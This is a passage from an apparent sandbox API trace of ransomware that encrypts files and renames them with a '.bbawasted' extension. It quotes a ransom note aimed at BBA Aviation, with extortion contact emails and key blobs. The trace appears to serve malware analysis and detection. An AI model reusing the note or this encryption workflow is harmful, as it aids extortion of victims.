"c:\\windows10upgrade\\resources\\amd64\\hwcompat.txt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0232.349] WriteFile (in: hFile=0x27c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0232.350] SetEndOfFile (hFile=0x27c) returned 1 [0232.350] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0232.350] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0232.350] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwcompat.txt"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwcompat.txt.bbawasted")) returned 1 [0232.463] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwcompat.txt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0232.463] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0232.463] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x11daf [0232.463] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11daf) returned 0x5f0000 [0232.463] CloseHandle (hObject=0x290) returned 1 [0232.583] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0232.584] CloseHandle (hObject=0x294) returned 1 [0232.584] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb80 [0232.584] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6020) returned 1 [0232.585] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x1b8, pbBuffer=0x6adbc8 | out: pbBuffer=0x6adbc8) returned 1 [0232.585] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0232.585] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0232.585] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0232.586] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0232.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0232.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb80 | out: hHeap=0x660000) returned 1 [0232.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0232.596] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]r3+FMLSZegBh3p+zlpViadE0WXxaeAqltdJAMqsk6te61WRuLI7DIh1K6wPPDGPx\r\n2TNc/0QXGuJ+YFMLKCiW85T7n5eOy8D4GC9HfU+NZ1X/dP9/oxLDuXxQtpyPWiAn\r\ni/zD6CAqFjo5lvNa9ImMayxSEFOGPyeD8yXt0WT56lj/UF7F1xrdsw08aSctK1+H\r\nkO3jZdDB/tkwyOxQ6+X/+4sU3lE7+9OCUn/he/2WfjSddA9bCMeP1x67DK8RzH8B\r\nZ/MERO+b0bCwYZSSKooq6yiRUzS1m69uqKBqeztngEA+qD0UJ4G9c3sbdE0paFtl\r\nbWyWjxgaKYkYQ5t1/3R9yorrNtVS2QvpJQKrr3xdmRxBRFRXzoWN1P5vT/keIvMs\r\nFFXSv6EmfXERL+0g6a2Eeu6REJRyR9IXShrteGogmNP2qmd0f2xNc3ZrUg/F38Z9\r\nw32DWd+STxlcexzhpDW/zaiBgoHmciEIuw3HNFuZfpTMkv87Epvjh1Q6b1LHvtbQ\r\ntg1PWBd6p1JdKqT21DV1Op5U6FdGGWv+V8TDLqmjGPChv2/8GUODrQqJYDwTKMIp\r\nU400PC7WoNaJBLiogl46tM1hMZxH21kKEr9VeSgQeNl/W/Sh1LkGqUsmQFNm83Vi\r\n1MJMzR4a1GbinTtU5JbXYgXk/n5Q3hu6eyzhrRiFVpa=[end_key]\r\nKEEP IT\r\n") returned 984 [0232.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0232.596] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0232.596] SetEndOfFile (hFile=0x27c) returned 1 [0232.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0232.599] CloseHandle (hObject=0x27c) returned 1 [0232.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0232.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6b18 | out: hHeap=0x660000) returned 1 [0232.599] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6130) returned 1 [0232.600] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0232.600] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0232.600] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt") returned 53 [0232.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6c4b88 [0232.600] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0232.600] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0232.600] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6c58) returned 1 [0232.601] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0232.601] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0232.601] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwexclude.txt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0232.601] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0232.602] SetEndOfFile (hFile=0x27c) returned 1 [0232.603] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0232.603] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0232.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwexclude.txt"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwexclude.txt.bbawasted")) returned 1 [0232.603] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwexclude.txt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0232.604] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0232.604] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x90d [0232.604] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x90d) returned 0x5f0000 [0232.604] CloseHandle (hObject=0x294) returned 1 [0232.752] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0232.752] CloseHandle (hObject=0x290) returned 1 [0232.752] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb80 [0232.753] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6350) returned 1 [0232.753] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x6adbc8 | out: pbBuffer=0x6adbc8) returned 1 [0232.753] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0232.753] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a68a0) returned 1 [0232.754] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0232.754] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0232.762] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0232.762] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb80 | out: hHeap=0x660000) returned 1 [0232.762] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0232.762] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]AstMBcbOdamD8YMX4pZTm4VvW1vTtjJ0qO+yveo7df2eLf+Ejkt609rQhTmT7pTi\r\n2OTDTlRmHzb3ifyFmCjosnZGgxlAdjJHbA6pdPyb8+hZiXszunREI1vGn3IdVOac\r\n/e4HGnU0vhD2bEahE5GJcsEk4qC4huFgsuropXu/ag4m3XaYn/Q2xgb6KoUTY5Ey\r\n9CulGRsoQA6WkRB6bcM44A4C8EqepdjeOM7Jn3d+sYUCYzHeOsKBmpXhe9lnOJ2l\r\ngq3MR/ouw/9VBgiD/KTNmb13OrTLQHzf/+w9Y/OaR2mwg6Gdvt5olCiGUz5tTzf3\r\nL0Oi4R/AiHlLfy0fEc85p3Zt91zkR15lFcumKE7rGP32JzwuUfFRKPhORGT9YJ0C\r\nuFBa5RgznNDH/Y1agBQDGaAxhcIkagZ5n6oOQJH4ENHeohDFm0R0DZYR4UDbN294\r\nkkV7dTQIRjfO2hUOhpNCugKib1SrQVr8tukt6YcyGb/IO6oDwaIdpEtvSuN54F39\r\nuWEPEiL8w1lozdunIQcr8aIXDjd4x4dRTNO0nuX45YcH42MJtv8I8HTXJg/Ykg77\r\nX4s+mcDHY/ZLTT1dmZPz7cW7+fPs4qd16NL54IVovPL1ekWejLVeOYD4qKxVVii9\r\naXRikK06Fwzq2hHgICgqE7KLNcey7cNlEgcu0XRfK5R=[end_key]\r\nKEEP IT\r\n") returned 984 [0232.762] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0232.762] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0232.763] SetEndOfFile (hFile=0x27c) returned 1 [0232.765] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0232.765] CloseHandle (hObject=0x27c) returned 1 [0232.765] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0232.765] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7798 | out: hHeap=0x660000) returned 1 [0232.765] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a5f98) returned 1 [0232.766] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0232.766] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0232.766] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat") returned 51 [0232.766] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6a21e0 [0232.766] lstrcpyW (in: lpString1=0x6a2246, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0232.766] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0232.766] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6680) returned 1 [0232.766] CryptGenRandom (in: hProv=0x6a6680, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0232.767] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0232.767] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.cat.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0232.767] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0232.768] SetEndOfFile (hFile=0x27c) returned 1 [0232.768] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.768] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0232.768] lstrcpyW (in: lpString1=0x6a2246, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0232.768] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.cat"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.cat.bbawasted")) returned 1 [0232.769] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.cat.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0232.769] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0232.769] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x26b6 [0232.769] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x26b6) returned 0x5f0000 [0232.769] CloseHandle (hObject=0x290) returned 1 [0233.281] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0233.281] CloseHandle (hObject=0x294) returned 1 [0233.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb80 [0233.282] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a69b0) returned 1 [0233.283] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x1b8, pbBuffer=0x6adbc8 | out: pbBuffer=0x6adbc8) returned 1 [0233.283] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0233.283] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6790) returned 1 [0233.283] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0233.283] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0233.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0233.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb80 | out: hHeap=0x660000) returned 1 [0233.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0233.293] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]rfhnBnHuM4qnzA/+/61J2zzOMOgHnW57A5Mx8kxEjR9FR8HfPexEfUreEvAC//IU\r\nzARXn8mjp7KcUVoRQCB5VPj/fKhu3bWgK1c0H8I6UenccGoK6Lc341p+cN3gIMyA\r\nlLqY4N94nBz64wzoN/eTP7XyK8sAqdEe/cbuBGo10t3Ov63udSAVYUckxbgznPz8\r\nnJbHUDR/7jXh28kykwwvIgp09YYQPNFEBft/BvinrUgtd3Xi8QNZsDD67klu9KQ9\r\nKZcSIGPJDz03MC+9WMB5dOpR7Zg3OJ9ehKSKEE8PzzpxEFScEv9RTZy7IHKIiU1g\r\nKofj+Vyg6kN6kkDoqeRpdM6Khbre14rz1ohBdN4ONhBa1tPeDQ0sqorqC9CUlEcX\r\nBmmy1a3AzNmbdTY1tKbrAs3Bxz8rsvagpKk2IuGzAJfQoWr+uNRg3iz5YEDFJ0Hl\r\ny/gcmKp/c/G+s3/yt4vQXNFThsw7W/rAua0HbEXUFCGi5qxqQno6kkZJLAuDVF8B\r\nmm1DGtBBam/BA9EnI5EmDf0b/h7hWmuzfzvRr15S/BDUtwPSboJOMU3ek3VromZH\r\nspu+2yJIOC40Tk/SPmfYI338jqFB1/lcDHq/TEHNyWcMx28S7wyYRczynd6OGiQH\r\nfwKpBajmmrFoAPNCm3NF4zQUMYmVY3Co/3+0MEznZij=[end_key]\r\nKEEP IT\r\n") returned 984 [0233.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0233.293] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0233.294] SetEndOfFile (hFile=0x27c) returned 1 [0233.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0233.296] CloseHandle (hObject=0x27c) returned 1 [0233.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a21e0 | out: hHeap=0x660000) returned 1 [0233.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b25f0 | out: hHeap=0x660000) returned 1 [0233.296] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a65f8) returned 1 [0233.297] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0233.297] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0233.297] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf") returned 51 [0233.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6a1cd0 [0233.297] lstrcpyW (in: lpString1=0x6a1d36, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0233.297] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0233.297] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a61b8) returned 1 [0233.298] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0233.298] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0233.298] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.inf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0233.299] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0233.300] SetEndOfFile (hFile=0x27c) returned 1 [0233.300] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0233.300] lstrcpyW (in: lpString1=0x6a1d36, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0233.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.inf"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.inf.bbawasted")) returned 1 [0233.301] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.inf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0233.301] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0233.301] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x5d7 [0233.301] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5d7) returned 0x5f0000 [0233.301] CloseHandle (hObject=0x294) returned 1 [0234.097] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0234.097] CloseHandle (hObject=0x290) returned 1 [0234.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0234.097] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a65f8) returned 1 [0234.098] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0234.098] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0234.098] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f10) returned 1 [0234.099] CryptGenRandom (in: 